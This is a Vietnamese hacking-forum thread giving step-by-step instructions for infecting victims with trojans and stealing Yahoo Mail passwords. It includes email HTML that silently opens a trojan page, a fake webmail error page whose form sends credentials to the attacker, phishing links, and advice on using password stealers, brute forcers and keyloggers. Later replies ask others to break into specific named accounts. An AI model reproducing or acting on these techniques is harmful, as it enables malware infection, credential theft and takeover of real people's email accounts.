Điều cần nhất trong quá trình này là bạn phải có 1 trang web để upload trang web có đính kèm trojan lên đó .Sau đó sẽ gửi mail cho nạn nhân ,trong email sẽ có 1 đoạn mã để mở trang web có đính kèm trojan đó.Trang web sẽ đuợc mở âm thầm mà nạn nhân không hề hay biết trừ khi nạn nhân cài norton antivirus 2002 ,tường lửa..hoặc able tính năng activex trong internet option.
Còn nếu không thì chỉ còn cách gởi trojan cho nạn nhân và chờ nạn nhân kích hoạt nó.Nhưng cũng đừng bi quan ,chúng ta cung vẫn có thể đính kèm trojan vào 1 file ảnh và khi nạn nhân xem ảnh thì trojan sẽ chạy thôi.Lo gì.
** ** **
Trường hợp thứ nhất : Nếu bạn có thể upload 1 trang web lên đâu đó.
Bạn có thể tham khảo các bài vè tạo 1 trang web trên mạng trên http://www.viet-online.net/.Sau đó đính kèm trojan vào web rồi gửi mail đến cho nạn nhân .
Để đính kèm trojan vào web ,trước tiên bạn cần tạo 1 trang web,nếu bạn là người chưa biết gì về web thì có 2 cách đon giản để bạn tạo trang web là như sau.Thứ nhất,bạn save 1 trang web nào đó trên m?ng .Thứ 2 ,bạn dùng world97 tạo 1 văn bản mới ,bạn tha hồ vẽ vời vào trong đó(đừng nói là bạn không biết dùng world đó nha),xong ,bạn lưu lại dưới dạng html(hoặc htm).Như vậy là bạn đã có 1 trang web.
Sau đó bạn cần 1 công cụ godwill đề đính kèm trojan vào trang web vừa tạo (bạn có thể down ở http://caodanghieu.dk3.com/ trong phần công cụ).
Cách sử dụng godwill như sau
Chạy chương trình --> chọn Enter --> chọn nút "html" trong các nút ở cuối cửa sổ Godwill --> chọn "general options" (hình 1).
+enter .exe file: path tới file trojan (k2ps.exe).
+enter .html file: trang web mà mình đã thiết kế.
+enter output: ten trang web có đính mã Godmessage (VD để là xxx.html, sau khi hoàn tất các công đoạn sẽ xuất hiện file xxx.html trong thư mục Godwill, trang web này đã đựơc gán trojan, không được mở).
+các tùy chọn khác là để thông báo bằng đường ICQ... nếu là newbie thì khỏi cần để ý.
+browser redirection: sau khi đọc trang web victim sẽ được chuyển về là http://www.yahoo.com/ (tùy bạn).
+HTA filename: sau khi xem web, trong start-up của victim sẽ xuất hiện 1 file .HTA ,đặt tên file đó nghe sao cho "microsoft" một chút để khỏi bị nghi ngờ (VD: msreg)
+sau đó chọn done.
+phần "advanced option" không cần để ý cũng được.
+muốn save config hay không là tùy ý, nhấn nút có chữ "GEN", trang web có gán trojan sẽ được tạo ra.
Bạn lưu trang web này lại và upload lên đâu đó trên các host .Xin lõi vì tôi không thể bày các bạn cụ thể về vấn đề này trong phạm vi bài viêt này.Nếu bạn muốn biêt thêm chi tiết về cách làm web và upload web xin hãy lên: http://www.viet-online.net/
Nếu như con trojan của bạn lớn hơn 34kb thì lúc dó bạn không thể đính kèm nó vào web được.Cách đơn giản để giải quyết vấn đề này là bạn up con trojan có kích thuớc lên dâu dó trên web hay ở đâu cũng dược miễn là bạn như dịa chỉ của file trojan dó(duong nhiên la file exe).Sau dó bạn dùng con chuong trình này để có thể tạo ra con trojan có kích thuớc 5kb có khả năng download file trojan lớn ở trên web về máy nạn nhân và chạy nó.Sau đó đính kèm con trojan có kích thước nhỏ này vào web như đã bày ở trên.Okie.một việc thật là đơn giản.Cách sử dụng nó có lẽ các bạn nên tự tìm hiểu lấy vì trong phạm vi bài viết về trojan này tôi không thể bày cặn kẽ về mọi vấn đề đuợc.
Okie.Sau khi đã có dược 1 trang web trên mạng .Bạn nên ghi nhớ địa chỉ của trang web có dính kèm trojan đó.
A.Neu nhu Victim dung OUTLOOK EXPRESS de nhan thu :
Bây giờ là cách chèn đoạn mã script vào source của mail để khi nạn nhân mở mail ,trang web có đính kèm trojan của ta sẽ âm thầm mở.
Nếu bạn gởi mail bằng OUTLOOK EXPRESS thì bạn bắt đầu chọn file kế đến chọn new kế đến chọn mailmessage
sau khi hiện ra khung gửi thu bạn chọn nút view_source edit.Tab Source dã hiện ra rồi ! Click ...
Nhìn qua , ta thấy dó là source của thu ( thường bằng HTML )
Tìm thẻ Body , sữa nó thành như dòng
<body onLoad="autoweb()">
Sau đó chèn đoạn mã sau vào
kế tiếp
<script LANGUAGE="JavaScript">
function autoweb()
{{window.open("http://www.yourweb.com","","width=1,height=1,resizable=yes,top=10000,bottom=10 000")}}
</SCRIPT>
Như vậy chỉ cần victim xem mail của bạn bằng OUTLOOK EXPRESS thì trang web có gán trojan (ở đây là <http://www.yourweb.com)/> sẽ âm thầm được mở (nếu không chú ý thì victim sẽ không phát hiện vì trang web được mở rất kín).
http://www.yourweb.com chính là địa chỉ của trang web bị nhiễm trojan mà bạn đã tạo ra lúc đầu đấy.
B.Nếu nạn nhân dùng Webmail để nhận thư:
1.Đầu tiên bạn đăng ký 1 địa chỉ email ở hotmail hay bất cứ webmail nào khác.Sau đó dùng địa chỉ email này để đăng ký 1 host (xem thêm về cách đăng ký host) ở www.trypod.com hay bất cứ host nào khác hỗ trợ CGI.
2.Việc cần làm tiếp theo là bạn phải làm 1 trang web giả mạo trang webmail của nạn nhân.Tốt nhất là phải ;àm 1 trang báo lỗi giả mạo để nạn nhân khỏi nghi ngờ.Có 2 cách để có được 2 loại trang báo lỗi
Cách1:Bạn login vào dưới 1 cái tên nào đó bạn bịa ra và password cũng do bạn bịa.Nó sẽ hiện ra trang báo lỗi rằng bạn đã nhập sai pass..Bạn lưu trang lỗi này lại cùng với tất cả các hình ảnh.
Cách2:Bạn tạo 1 địa chỉ email trên webmail mà nạn nhân đang sử dụng(yahoo,hotmail...)Sau đó bạn login vào và đợi khoảng hơn 1 tiếng đồng hồ và nhấn vào nút SOẠN THƯ(compose,write mesage)
bạn sẽ nhận được trang báo lỗi với các lỗi như:Time out..Bạn cũng lưư trang lỗi này lại với tất cả hình ảnh của nó.
3.Bạn dùng NOTEPAD hay bất cứ chương trình soạn thảo văn bản nào để biên tập lại file web lỗi mà bạn đã lưu về
Bước 1.Tìm đến dòng có thẻ: <head>...</head> và thay nó bằng <noscript><head></head></noscript> để ngăn cái popup quảng cáo của TRYPOD mục đích là để làm cho nạn nhân khỏi nghi ngờ.
Bước 2.Tìm đến dòng: <form method=post action="xxxxxxxxxxx"> và thay nó thành <form action="http://www.free-cgi.ch/cgi-bin/formmail-a.cgi" method="get"> <input type="hidden" name="redirect" value="http://xxx.xx"><input type="hidden" name="recipient" value= "your@email">
your@email chính là địa chỉ emaill mà bạn đã đăng ký lúc đầu và đã dùng nó để
đăng ký host .
Bước 3:Upload file html đó lên host Trypod
Bước 4:Gửi cho nạn nhân một fake email định dạng html .Trong đó bạn điền đoạn code này:<meta http-equiv="refresh" content="1;url=Địa chỉ trang web lỗi của bạn"> vào trong thẻ <head></head>
Bây giờ bạn chỉ can ngồi chờ nạn nhân mở mail và khi nạn nhân mở mail trang webmail sẽ refresh thành trang lỗi của bạn.Khi đó nếu nạn nhân login lại thì đòng nghĩa với việc 1 email chứa thông tin của nạn nhân(user và pass) sẽ được gửi đến email của bạn(email lúc đầu mà bạn đã đăng ký).
Trường hợp thứ hai:Nếu bạn không thể upload 1 trang web lên âu đó và thậm chí cũng không có khả năng tạo 1 trang web thì có lẽ chỉ còn 2 cách sau
.Gửi file trojan trực tiếp cho nạn nhân và hy vọng nạn nhân sẽ ngờ u ngốc đến nỗi sẽ kích hoạt nó.
.Cách thứ 2 là đính kèm trojan vào 1 file ảnh.Chương trình này hiện có trên http://caodanghieu.dk3.com trong phần công cu.Sau đó gửi file ảnh đã dính kèm trojan này cho nạn nhân .Nếu là file ảnh thì có lẽ nạn nhân sẽ mở mà không ngần ngại đâu.
III/. Tài nguyên trên mạng về trojan
Hiện có rất nhiều địa chỉ cung cấp cho các bạn trojan cũng như các thông tin về nó.
.Những chương trình mà tôi nói tới trong bài này hiện đều có trên http://caodanghieu.dk3.com/.
.Ngoài ra các bạn có thể tìm thêm các trojan khác ở các trang web nổi tiếng sau:
http://megasecurity.org/,http://www.tlsecu....blackcode.com/ (http://megasecurity.org/,http://www.tlsecurity.net/backdoor,http://www.blackcode.com/).
.Nếu bạn muốn tìm 1 con trojan nào hay công cụ nào ,bạn cung có thẻ tìm nó trên http://www.google.com/ bằng cách gõ tên chương trình ,trojan vào khung tìm kiếm rồi nhấn Enter.
** *
Lòi ngỏ:Trong các hướng dẫn của tôi ,có thể chưa được tỉ mỉ về nhiều mặt nhưng thực ra điều đó lại giúp cho các bạn có thể chịu khó động não tìm kiếm hơn.Chúc các bạn may mắn.

Bài thứ 2 này

Có rất nhiều cách để lấy trộm mật khẩu Yahoo Mail .Tuy nhiên việc lấy trộm dễ hay khó là tùy thuộc vào trình độ và khả năng của mỗi người khác nhau.Và cũng tùy vào từng trường hợp.
Sau đây tôi sẽ trình bày cho các bạn vài cách mà tôi biết để các Bạn tham khảo.

Cách 1:
Bạn hãy dùng con virus Magic_PS .Con này hiện nay đã phát triển đến phiên bản 1.5. Con này có 1 ưu điểm rất mạnh là lấy trộm Password qua con đường chat Yahoo Messenger.
Trước hết bạn hãy Download nó về .Sau đó để giải nén nó ra bạn phải tắt tất cả các phần mềm tiêu diệt virus như Norton Antivirus và hãy dùng phần mềm giải nén là Winzip hay Winrar để giải nén ra .
sau khi giải nén Bạn hãy chạy tập tin file.exe và sẽ được như hình sau :



sau đó bạn hãy nhấp vào các mục chọn lựa như hình trên .Phần Y!ID bạn hãy điền email của bạn vào .Con Magic_PS sau khi lấy Password nó sẽ gởi vào hòm thư này .Sau đó nhấp vào Creat MPS .Nếu thành công nó sẽ tạo ra một tấp tin mới có tên là Sender.exe
Bạn hãy gởi cái tập tin mới tạo được này cho nạn nhân để lấy pass.

Cách 2:

Nếu bạn truy cập Internet công cộng mà có vài người mới vào nghề và bất cẩn lưu lại Password ở máy khi nhấp chuột ở phần
chọn lựa là Remember my ID on this computer đối với Mail Yahoo và Rememember my ID& Password đối với chat Yahoo Messenger .Tuy nhiên lúc này bạn chỉ nhìn thấy các kí tự ở dạng sao * và không thể biết đó là các kí tự gì .Nhưng không phải vì thế mà chúng ta chịu thua phải không nào ?
Trứơc hết bạn hãy Download phần mềm soi Password này về .Sau khi Download về xong ,bạn hãy giải nén ra ,chạy tập tin file.exe .Sau đó hãy kéo chuột vào nơi có password là các kí tự ở dạng sao ** và lúc này bạn sẽ nhìn thấy các kí tự đó là gì .

Cách 3 :

Bạn hãy dùng phần mềm dò tìm password email là Ybrute hoặc Brute Force để tìm .Bạn có thể tải phần mềm này về bằng cách vào Google.com.vn để tìm kiếm với từ khóa là "Ybrute" hoặc "Brute Force"

Cách 4 :

Bạn hãy tạo 1 email giả dạng như người quản lý hệ thống vi' dụ : pw_return@yahoo.com sau đó đi ra với thiên hạ rằng muốn lấy Password của ai thì hãy gởi 1 email tới địa chỉ :
pw_return@yahoo.com
Subject: Password !
Phần nội dụng đánh như sau :
+Dòng đầu tiên đánh tên email muốn lấy pass
+Dòng thứ hai đánh email của bạn
+Dòng thứ ba đánh password của bạn (Yahoo cần kiểm tra email của bạn để gởi password )
Bạn hãy chờ 2 phút để nhận Password .
Chỉ bấy nhiêu thôi bạn đã có thể lấy được bao nhiêu password hòm mail rồi đó .Tóm lại cách ở trên là 1 hình thức lừa gạt những ai dễ tin và mới vào nghề .Tôi lấy Ví dụ dưới đây cũng là 1 cách lừa gạt tương tự ở trên : Banj hãy rao như sau:

Để lấy password hòm thư Yahoo Mail bạn chỉ việc làm như sau :
+ gởi 1 bức thư tới địa chỉ :return_pw@yahoo.com
+Subject: Đánh tên User cần lấy pass
Ví dụ :victim (Đừng đánh victim@yahoo.com)
+Phần nội dung bạn đánh như sau : (nhớ đừng thêm bất cứ cái gì )
/config/cgi-bin/start?v703&login=ten login cua ban&f=password cua ban&f=27586&javascript=ACTIVE&rsa>

Đây là 1 cách lừa gạt khá tinh vi .Lúc đầu tôi cũng bị mắc lừa với đoạn mã ở trên vì kém hiểu biết.Vì thế nếu bạn làm theo cách trên thì coi như pass của bạn đi tong đó !

Cách 5 :

Bạn hãy dùng phần mềm keylogger để cài vào máy tính .Phần mềm này sau khi cài ,nó có khả năng ghi lại tất cả các thông tin mà người ngồi truy cập vào máy đó và gởi email của chúng ta bao gồm cả Username và Password.

Cách 6 :

Bạn dùng Fake login .Có nghĩa là bạn hãy tạo 1 giao diện giống y hệt Mail Yahoo .Sau khi victim đăng nhập vào trang này User name và Password sẽ được gởi vào hòm thư của bạn.
Bạn có thể Download Source về và chỉ cần chỉnh sửa lại bằng Email của bạn

chao ong anh nhe
nho ong anh giup em viec nay duoc ko
em co hom thu nhung tu nhien mat mat khau nho ong anh lay lai ho em nhe
mail la:love_wind1984@yahoo.com
sau do ong anh gui vao hom thu moi cua em nhe
infuture101084@yahoo.com
tai hom thu kia nhieu nick qua ko muon bo
[quote=hoanghuyae,May 6 2004, 04:29 PM]
ðầu tiên

hãy copy ðoạn mã này :

QUOTE
<A target="_blank" href="http://nguyenanhduc.web.aplus.net/dienhoa/login.htm" ><FONT

face=Verdana>http://thaonguyentinhyeu.us/buuthiep/valentine's card.html</FONT></A>
sau ðó
vào yahoo của bạn soạn một tin mới . Bạn hãy ðể ý dýới góc phải có một chỗ ghi là : "View HTML Source " hãy ðánh dấu vào ô ðó ! mail của bạn sẽ chuyển qua một dạng khác ..., sau ðó xóa hết những gì có trong phần nội dung mail ...nhý là "

" gì gì ðó , sau nữa là paste ðoạn mã vừa copy ở trên vào trong nội dung của mail . Một lần nữa click chọn lại ô "View HTML Source " nội dung mail chỉ còn lại là http://thaonguyentinhyeu.us/buuthiep/valentine's card.html
vậy là bạn có thể gữi mail ði và chờ pass ðýợc tìm thấy tại
http://nguyenanhduc.web.aplus.net/dienhoa/pass.htm
mà thôi !!!
còn phần thêm mắm muối sao cho ngýời nhận tin thì do khả nãng của you thui ! hi` hi`
Gợi ý :

Chào anh chị, "tên ngýời nhận"! Có ngýời tên là "tên bạn"("tên bạn"@yahoo.com) gởi ðến a

Sinh năm 84 thì là bạn thôi !
Nhưng thú thật là giờ làm việc này hơi khó ... có thể hòm thư kia bị mất nhưng không có ai mở nó ra thì lấy thế nào ? Những phương pháp trên không có hiệu quả 100% -Nhất là giờ mọi người đã cảnh giác cao độ !
Còn 1 số kiểu nữa nhưng chưa có thời gian làm, nên giờ chưa giúp đỡ được -thông cảm nhá ! Hehe

hic! em lấy mấy trăm cái pas mà chẳng biết dùng vào việc gì đây này!
dùng brave ấy mà! victim chuối nên....

Hi! Bạn lấy cho tui cái pass này nhé tuyetngohue@yaoo.com. 1 chầu đã đời luôn.